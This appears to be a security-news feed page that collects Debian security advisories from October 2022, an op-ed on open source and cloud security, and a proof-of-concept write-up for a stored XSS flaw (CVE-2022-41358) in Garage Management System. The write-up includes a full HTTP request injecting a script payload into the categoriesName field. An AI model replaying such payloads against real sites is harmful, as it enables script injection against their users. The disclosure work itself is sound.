Debian Linux Security Advisory 5266-1 - A heap use-after-free vulnerability after overeager destruction of a shared DTD in the XML_ExternalEntityParserCreate function in Expat, an XML parsing C library, may result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5266-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 30, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : expatCVE ID         : CVE-2022-43680Debian Bug     : 1022743A heap use-after-free vulnerability after overeager destruction of ashared DTD in the XML_ExternalEntityParserCreate function in Expat, anXML parsing C library, may result in denial of service or potentiallythe execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 2.2.10-2+deb11u5.We recommend that you upgrade your expat packages.For the detailed security status of expat please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/expatFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNehABfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TT5RAAiDBqtdgoagQspAsmWvoT1IJw0fsx2IFA4ynzyAI33nXegNKfDUGmc9wWKVm4APPaFWvy9s4hlA7HeMUdRQRxuW2iL5q3Jnkbjcnm1kISTgxPymt0HFeJWr9TVRSQt0OqUtzzOvNAz2lSd86551EMPa/oS0fvLq/vDTC3mTL1WsoMsouJR+l7potTMtJf43G10AmfLx+XgSsfmHU2Hvf5S2PO7aEmNHic9HW7bwUqm6KF2lZs5Qo4IVykqQ3eKufLg0HZcOi+QMWxpKYzxOR/tnzYHjLAzTI7yjugBBufcaux1kYnB0ULnDLfOc+uHXuhttfji4sbEzGB9uWDX+rhtBszcaM/Ww53J8tDy3chnv93pi5em1ABQljrPjFz/+N4g4tsNgdCTvMjT332kPi6W9zFUA/iB21LP4H7xc3stGCVubZW0UVcvOu2ubCabr/XQBOtlnc4tj/L9UyQW+Rfqe9x1WHkhwTuHMg8/YcqWljv3LwTz1DXfyFF0vmSlliOr0POP7I0iJvrw647rVBaNEsVPNqFhPu5Ro5jd5y3gt+f763J692JXfTPQJc3PaJz37NCdupga7lPu1W5cSLAYtze5JxqH4XJaKFprpaGfo3OFIDas0Z5yIs8DxMbjmY9VlpMQ8vKfHYPgoKV+NRv9bKKpBLxYI/o4bq8uA4JgpE==bLU+-----END PGP SIGNATURE-----

Debian Security Advisory 5266-1

Debian Linux Security Advisory 5265-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5265-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
October 29, 2022                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2021-43980 CVE-2022-23181 CVE-2022-29885

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2021-43980

    The simplified implementation of blocking reads and writes introduced in  
    Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing  
    (but extremely hard to trigger) concurrency bug that could cause client  
    connections to share an Http11Processor instance resulting in responses, or  
    part responses, to be received by the wrong client.

CVE-2022-23181

    The fix for bug CVE-2020-9484 introduced a time of check, time of use  
    vulnerability into Apache Tomcat that allowed a local attacker to perform  
    actions with the privileges of the user that the Tomcat process is using.  
    This issue is only exploitable when Tomcat is configured to persist  
    sessions using the FileStore.

CVE-2022-29885

    The documentation of Apache Tomcat for the EncryptInterceptor incorrectly  
    stated it enabled Tomcat clustering to run over an untrusted network. This  
    was not correct. While the EncryptInterceptor does provide confidentiality  
    and integrity protection, it does not protect against all risks associated  
    with running over any untrusted network, particularly DoS risks.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u4.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmNdoYJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRLxxAAzz/exjL7ERlJfqqvv1ofnRRmmJYtqaofzV8Ewb/xrFIQM8ZXohWLF9a0  
s0monZtUm+eQEKM3nYl1nXPI4l/shKnvo9yU17gcxqBgzBeYqsX9hqDm2Ie0raS7  
n22rwO4fHcQJ7vhSx2oYNL++YbEYQFEZgz+ZfiOLStHc2pIq2fxi4+jXuXHMUwuS  
KuCOYF8VLBjY87T7BT168GtKi02sIQzbXgAQSAGU6WsOvV4DLjagn/g+b1lK8F5u  
xO6rU2iM6pR73Ei2H2pb1B39BGhjorub7L2GQfiIMKf3bD7M+jflCnGq3n/xsUrO  
6PkaSCaN4DEip9V+3DBJ4TcOj0x/LzHMHimDoZ/CLI5qoPq5KWS4L7AKXM876+v5  
HIIzDH5B5INTeSEoVDkgKVx2fy8ZbaeDV+cmFTjXb+pmFpxxEuPGRYJg3Mv8PsqZ  
qPUqyrTKx8treIfXNJhJL00omDAX1T75H38BMNv56BbAHcBfszyFHHzr9uPo0+Fc  
tLYanZlx48IfCLXhOl2VcyE5up1snJmtMG1S2wFfl4btVfApGSAzAxSeYau+EGTu  
poFmm/5atf68cKEyGIuPFeNk97mqIp55gDi5lks/Cs7wW/EJndzFd/g5LwXb1HO1  
E30OhC79DT0Jlwpw3+VhS475K3XzGOhnk4x6DA1a/NtAzzaz7dg=  
=U52K  
-----END PGP SIGNATURE-----

Debian Security Advisory 5265-1

Debian Linux Security Advisory 5264-1 - It was discovered that Apache Batik, a SVG library for Java, allowed attackers to run arbitrary Java code by processing a malicious SVG file.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5264-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyOctober 29, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : batikCVE ID         : CVE-2022-41704 CVE-2022-42890It was discovered that Apache Batik, a SVG library for Java, allowedattackers to run arbitrary Java code by processing a malicious SVG file.For the stable distribution (bullseye), these problems have been fixed inversion 1.12-4+deb11u1.We recommend that you upgrade your batik packages.For the detailed security status of batik please refer toits security tracker page at:https://security-tracker.debian.org/tracker/batikFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmNdoPxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeSwixAAz3126lRuHpJFXreXL0dbIwiahb36LhtNx29gI7C5QkzFt49svIswJ7JM+n9GokhtggWNuyN7wF6fyQzH7VEZSYW9yzzoUbbduJoTnBArtwYyuKdfg1KnWl7h/Wzvd8JuyLtMDCXivlqNbatfenoipUclYtB7bupb+8YX71GKxh/vXU9kR6jS5eQLUnLk2SdbVMfwEna+KqEjt4yyS7SXWNJcMOVPbQLPhvjq8xMVAaShxNjn0hk7gGEtH2TBFSp7UcX8kmuPCES/70t8cS7jiA8FjRRz1M8Lf12SZGLbCCtZMQdlY4Lc0OP22Di2PTwSU0cg6dQJPR9zbXeBMA6Bff6hsCs4eFUugmPE28N7zSs4cjiNvn//+Kf4C/unsaOMR6bony/z9AqjxjvYv34h3AVd0/8Bg9GLe6kYX38EaY7D/biiZKPgbkQzXo6DU7rm8fFEGcTj/1yY+ScgznkfPob6QYLpT+b0jF+KpLPfA/Lz2bOh2DNHUVV9hKLC3t8i02KPhxrwbbpeJ7L7F8o/Giw0Ho6m0RLCTm2+sR57t7cHF9B0PH7qZRsgMp4GSrydeUUK8SZGMus1NnSmqbfd4GiY2Wohd3GiN+YqIK4lWbhNi3RZg2VFaGsVRRVtnBAgaCCZcd0BjvNEIpOoPXro97I0lqwKiAqBnKZobh86/dU==yzAL-----END PGP SIGNATURE-----

Debian Security Advisory 5264-1

Debian Linux Security Advisory 5262-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5262-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 27, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2022-42927 CVE-2022-42928 CVE-2022-42929 CVE-2022-42932Multiple security issues were discovered in Thunderbird, which couldresult in denial of service or the execution of arbitrary code.For the stable distribution (bullseye), these problems have been fixed inversion 1:102.4.0-1~deb11u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmNa7koACgkQEMKTtsN8TjYPZRAApCIeC67U5v1tdzqmO49gDFrXVF4lcTiHaQxfMd+8Z0G/hdBdwJorRekj8o2vKfp7AbmpR3flDP9/v9ugCQxdu3G8tbUEG+Plezz6+XskPdTS9wil7WLeoA3LftFTqrzeECcSeoarXdMt3OsQ43Lcxvyzbw1X8Fht3tUB3VLSF0+y4NmKtv0RS1Qd+kL3uCm+wBd4gUWD6HBwPhR6uxso+BqTz16fgqyKCSsQvZ7erw8Hszra9ZbEXfEnBOA0yl25eCPgAN0KZRqjq4o6fBEgOo3VeTDf2IAG50Mcecd/wismxZqWQycNSRCrnhSrqPaL2hN1KkxxjN4SV4I9xaERyTKt4wfy71Tx9NFMpS8GuRZ4qi1NxUX6Y4BQshDAv2iLJ2vHB5om76qLzlx1CdynZkDPIv+q5rfs40gIZH7gcKrI4D6WlwYTvNVUBOTjUhpxDvuperRUkGe4pR2upAmbGwiVdORvJGY1BzDOi2AMc90g7/l4bktV6wEFApnjGIOBWBfYtbf5lzYzGCynfP71Z9ZBLmTtjMScjln04n+IzX+Dkl5DREgVZilbClhB9kSb15msinn3lok0NyJaF3V76HDiaJUtmAXzrfLrblkk1Aw/HMD3ryF2VUizYB0zMI4iz3UR+tS2ww6tWEesgt9DL5f8cEstL8fNtk0hUZ6U/qE=avOl-----END PGP SIGNATURE-----

Debian Security Advisory 5262-1

Debian Linux Security Advisory 5261-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5261-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 26, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2022-3652 CVE-2022-3653 CVE-2022-3654 CVE-2022-3655                 CVE-2022-3656 CVE-2022-3657 CVE-2022-3658 CVE-2022-3659                 CVE-2022-3660 CVE-2022-3661Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 107.0.5304.68-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmNZexEACgkQEMKTtsN8TjYRnxAAqAA0Egh1wZoBi7sCYhoCqR546MdWDKO/bJfqYq2aKO3KZDz9Td7BnZ1t/v+Cj49QBk+OfQaLbSP0KTcPqYIQAtd9z2bdskSs+4rFcj+jFmmM59WsSEghsGGApANaYUUsDitGqVJpFUkZCXHYxYUt0sWJYZ8QeYHipQr6Mw22+n77igvQjpqzdIpDXIUlSasDGx7vFoX0Psu8C5TvXhCjxzFr0mLHRuEf+HjlrEwS7eTrycZN2rcc0JFH6oCwVtitKsiEwhystoaDaX1YKZczQ/O9S+pBj4wh4PTQPNTUeODyN3pZKwRVJmUM8rR/lBTEfFRtUw615ieDX/lideqfo9OK0GmY3iSwf5oL728iuu5seWcPKAO09t6sNvG2Fjw6JTn0NQ7z9LZFHeWDbDlLV6ABQ2VusoMMRRkAdNV9ycuiXThGsQBw6ukTUzUfKnui9NV37ouDClnahB96/Y4i8BGXyYF0T4TMCJUtiZCG4xASGEbMHwUO4h6A2WjIq/m6F2pg98cEG/losAuxBwtwzRzoUY8gvoQZE+7WoMTRyQIpmO8AfJraNvexKx/im/7eLvtF/0XIy57hQzRsnbOQ1RzcdxDgV4zJ+L+QeyXDgkAwYs1s1Xtt7Dl21New/cV0OUInJ9Z9qvOo2Hz7D/UOYopDjlhx1XMZJPtgXIOilQQ=rkOd-----END PGP SIGNATURE-----

Debian Security Advisory 5261-1

When we depend on an open commons as our computing foundation, we need it to be secure, and the most effective way to do that is through open solutions.

Open source software is deeply embedded in enterprises today: from the Linux kernel to data center infrastructure, and from databases to application servers and front ends. The importance of securing the supply chain has become front and center in the industry, with the US government's involvement and the formation of industry bodies such as OpenSSF to work on solutions.

We know that we must secure the open source software we use — it's also important that open source be an integral part of the solutions that we create. Proprietary solutions alone are not enough to counter the threat to the ever-expanding areas of vulnerability. To properly secure our software dependencies in depth, solutions must interoperate tightly with key open source infrastructure such as the Linux kernel and Kubernetes.

Through our experience with creating the Falco runtime threat detection tool, and contributing it as open source to the Cloud Native Computing Foundation (CNCF), we've learned valuable lessons about how important it is to provide open source solutions for security.

**1\. Collaborative development goes broad and deep.**

Security is a never-ending battle against expanding attacks and attack surfaces. Through collaboration, we are able to bring together more expertise, apply more scrutiny, and cover a broader range of use cases than through proprietary development. Nobody can be an expert on everything, but many people can come together to contribute their singular deep expertise into an open source project.

While Falco's core competency specializes in monitoring Linux syscalls, the team strategically added a plug-in interface. Through this, other infrastructure can be secured, from Kubernetes admission controllers to cloud services such as AWS CloudTrail or Okta. The open nature of the project means that experts in particular platforms — whether open or proprietary — can contribute their know-how and help the entire user base. Proprietary approaches can't reach this same level of scale.

Moreover, you don't need to ask anyone's permission to extend open source to cover a new service or platform: If what you need isn't there, and you're able to contribute, you can ensure that your needs will be covered in the future.

**2\. Standards-based development promotes choice.**

When open source software is part of a multivendor body such as the CNCF and in widespread use, adopters can reasonably view it as being a _de facto_ standard. Using open source standards provides an interoperable framework in which an ecosystem of tools, support, and training exist. As a user, you always have the freedom to control your own solution by directly using the open source, or choosing commercial tools that interoperate.

Drawing from Falco as an example, multiple vendors such as Sysdig, Red Hat, and Sumo Logic have built their own solutions based on the codebase. At their core, they are aligned on the protocols that Falco uses for event capture, meaning users get choice, a richer ecosystem of tools that use the standards, and future optionality.

**3\. Open source is transparent.**

Open source gives you the full visibility to examine exactly how a piece of software works. This transparency brings a double benefit.

First, if you're trusting every node in your systems with a tool, you want assurance about its security. Even if you're not auditing the code yourself, you benefit from many contributors with the resources to find and fix vulnerabilities. For software that has achieved widespread adoption, these contributors likely include cloud-scale operators with deep expertise.

Second, open source brings you insight and possibly influence on the direction of the software. You can become a contributor and influence technical direction, or allocate funding towards supporting its sustained development. When that software lives inside an industry foundation, you may benefit from established standards in governance, auditing, and sustainability.

**4\. Modern platforms are built on open source.**

To provide the assurance users need, security should be considered as an integral factor of any platform, not an optional extra. Open source is the engine room of the modern software stack, and therefore security solutions must also reach into the open source foundations. The cloud-native era has driven new approaches to operations and architecture, and security is no exception. Following the desire to "shift left" and incorporate security earlier in the software development life cycle, the same benefits apply to doing that with the open source foundations that run our enterprise platforms.

**Conclusion**

Open source is the only approach with the agility and broad reach to set up the conditions to meet modern security concerns. Users depending on massive open source infrastructure — the basis of today's clouds — should be careful of any security solution that does not acknowledge and leverage open source itself.

When we depend on an open commons as our computing foundation, we need it to be secure, and the most effective way to do that is through open solutions.

**About the Author**

    

Edd Wilder-James' career spans open standards, open source, and data analytics, in roles covering technology, content, business, and strategy. At Sysdig, his team is committed to growing Falco as the standard for runtime threat detection. Previously, Edd led teams working on open source programs at Google, working with TensorFlow, Kubeflow, Go, and Kubernetes. He has over two decades in the open source world, chairing OSCON for six years, and is a former Debian and GNOME contributor.

4 Reasons Open Source Matters for Cloud Security

Debian Linux Security Advisory 5260-1 - Igor Ponomarev discovered that LAVA, a continuous integration system for deploying operating systems onto physical and virtual hardware for running tests, used exec() on input passed to the server component.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5260-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 23, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : lavaCVE ID         : CVE-2022-42902Debian Bug     : 1021737Igor Ponomarev discovered that LAVA, a continuous integration system fordeploying operating systems onto physical and virtual hardware forrunning tests, used exec() on input passed to the server component.For the stable distribution (bullseye), this problem has been fixed inversion 2020.12-5+deb11u1.We recommend that you upgrade your lava packages.For the detailed security status of lava please refer toits security tracker page at:https://security-tracker.debian.org/tracker/lavaFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmNViSgACgkQEMKTtsN8TjbTZQ/+PZMyV4LA6box8yB3VGBSBfh4NSDKqtc0YqmsBhMFbiXAtSqNfxr93GEId+e6cHdGJQn73g0gLj/N70922Qz7k+nC7+kjDBul19S84M2gp5O9OWaOgXwZVBS2BFJQkdGz4yG1bp94GxX/S66q1podS+NWFP6M87OD3eB/XnBUIPYj9K+ItUiSwr3XNiXvqF1ocItc4yGjtJDM8Dh7avYL0mVLJ+VEZV3x2JVGR2ytTDOQOT9MOiNl5aG+PziP8nzxUN4XcS5vSjFQjCNrfEJ43vCR5n20KBFMgTA8NlRGqKhElHuel2MC2R4UreOnw7l6/6b05aaUfXJhi94KZx8/4ZEniL7MF6WyGmCnXp2oRlEM07U+nefTOo2qPbPfEm4fFYajFVSO7Spq4GbSYdDku1/83zoa1BFOw3UU2YQhYfNFhmcR6cLoqdVwvjitSbIfysdtvWWXef0q1cdmI5M1GWfiuIOstUQsleOQCBDxqMyGtxoZzvwwDyAteZe8dV8iBwgDPYwuii40l0/0npSVEsmwMUCz6K6D0b0AxmGmAf487c64WErQhlRF9dl/VYzwLtPJNweEUC3y3CwhrdFu1J3w/4Blj0+ynnMgqUENwMFvCTJlitbMy74oDUY3qu3tGE52FGCODrct5ksPShI9KBAyE7DDlnsapJjV0yuvxZQ==b+Kz-----END PGP SIGNATURE-----

Debian Security Advisory 5260-1

Debian Linux Security Advisory 5257-2 - The security update announced as DSA 5257-1 caused regressions on certain systems using the amdgpu driver. Updated packages are now available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5257-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 23, 2022                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
Debian Bug     : 1022025

The security update announced as DSA 5257-1 caused regressions on  
certain systems using the amdgpu driver. Updated packages are now  
available to correct this issue.

For the stable distribution (bullseye), this problem has been fixed in  
version 5.10.149-2.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNUyy5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TZ4xAAibsuLCjd0d0XfWQ24WZsI7I1wn1FvP/NRM3j8SEq/86uF80yiBmOeRoA  
5kDli4+cd/YwCrEHd+qoS597uUqV6kr6YUg2z/t/lvl//ZNDHegh2SmwXghISwmk  
E96Ix9CcLtEkNui5UeFbCRJqSnFmh5++CJE85tR3hq+GpbNYqoO0ZA5Cg26H2EXJ  
1S27U79fKgpFRj0GE/TFj/S6Uk2MxrfQ4vwv3Xm8n2b9f2eGVKI5f8cQu2jCCnzi  
IhavwMzC7WXRxNwrI/QoGRFjx6nCieFvEpO2aCsgKY5KPA7ecXBoI+w9ALSYVvAI  
/CIG4hppNbLxCgGr5VViXHmRwo17riMLyVc7B3OljlkZmwKAgkriHqlh/pU0uM6J  
By+MyjR9BNhH9ZA3Ry9+Y5rNNVmSqaTY3goRxSEeo29H/mZyTHE4Urdua7hNlLmU  
wWgA/sc4amF642fFjYV4m/zoyZmiPA3miyy/RnkzEHzV3+yPwX3kh/myJuPMmRb0  
YWF4Lr/iVINxyP6+O6MzsqdiAaa/uWJ5JBSdhzLP00dM/Sl0oGY1YJB0hehkftey  
hItI/v6C0GdUksWBtWrFJc4s/tiVThBONlvEd5ENmc1Cu2RVZWsJGdmsLoYBoMHS  
o1fEhq4zJijIiqfEGXEVdTBNfJQ/eMaEZ9R8ZYSLrc7FlnfJS64=  
=kbFE  
-----END PGP SIGNATURE-----

Debian Security Advisory 5257-2

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

**Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS****Exploit Author: Sam Wallace****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Version: 1.0****Tested on: Debian****ID: CVE-2022-41358****Summary:**

Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

**When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side.**

**This is the request prior to any modifications in Burp.**

**Perform a quick modification in Burp...**

**Profit!**

**Proof**

**POC**

    Parameter: categoriesName
    URI: /garage/php_action/createCategories.php
    

    Host: 10.24.0.69
    Content-Length: 367
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.24.0.69
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.24.0.69/garage/add-category.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
    Connection: close
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesName"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesStatus"
    
    1
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
    
    
    ![Alt text](/img/Intercept.png "Optional title")
    

**Reference:**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

CVE-2022-41358: GitHub - thecasual/CVE-2022-41358

Debian Linux Security Advisory 5258-1 - Several vulnerabilities were discovered in Squid, a fully featured web proxy cache, which could result in exposure of sensitive information in the cache manager (CVE-2022-41317), or denial of service or information disclosure if Squid is configured to negotiate authentication with the SSPI and SMB authentication helpers (CVE-2022-41318).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5258-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 19, 2022                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : squidCVE ID         : CVE-2022-41317 CVE-2022-41318Debian Bug     : 1020586 1020587Several vulnerabilities were discovered in Squid, a fully featured webproxy cache, which could result in exposure of sensitive information inthe cache manager (CVE-2022-41317), or denial of service or informationdisclosure if Squid is configured to negotiate authentication with theSSPI and SMB authentication helpers (CVE-2022-41318).For the stable distribution (bullseye), these problems have been fixed inversion 4.13-10+deb11u2.We recommend that you upgrade your squid packages.For the detailed security status of squid please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/squidFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmNPspFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Stmg//YqWFl3omXVLVD3yzv1C0MMXLcndcYPFb42tWRJr2eulh+7lOdC0gqLmg5l/iZLkFhvdAo2hsSN8c0jkKFm2n6GC4O6vc84DF5RE7xVbt8TXOBXZhq+C7FKLmRNa1y1M9UbjH7YsHbJvfWKEDJcDuceQFGcvFX2JsXYTtHnQtwYRpsUfZWOJkK/VYjvWOHKfeppgg1zeVCEiL3sQZ//7I+xd3ShzjR1iRj58L6tmF+64el+YFk6XGQtAAZHr4AsBv46VuEnfOvynJjCMs5Nm/zfceAhxez3tLRBJ0q7N7Ka/jNeFx7UAMigsoAZ2Bf3YXkYYPLcU9odl0VeCZRe/lxraUuPu9wBHK30jTfDastJPUJVwfTluyTB6LkCHm5UjzegRYw8EO/fHylND64TqW9xmuxmOrcdvo//MejOiKIDHTd3sX0ZkceXcwMQS7+qOvGAS9gUhSoG29XTAPWUj9sLpOnCmS5zSa2OdJ7ZX0Mv3sFs/HLe5MBLQ87E0t5R+US2XsTHcIBizCZxrYXOB3gtvBIV/4Ik06BF66QMXDlZuHqDNsWmJoKmBSHU6QFcbdnSfc1B0+1Aa8LKOXBSBt2WvSkrlCEA/TpuXKghjNLdJ4kBTNM8pD1iCj/j8mgUh5Bnr7SEp/Tgd006sTGcgVFLPFKnyxdAN8iG3N4+ijFxE==nyyH-----END PGP SIGNATURE-----

Tag

#debian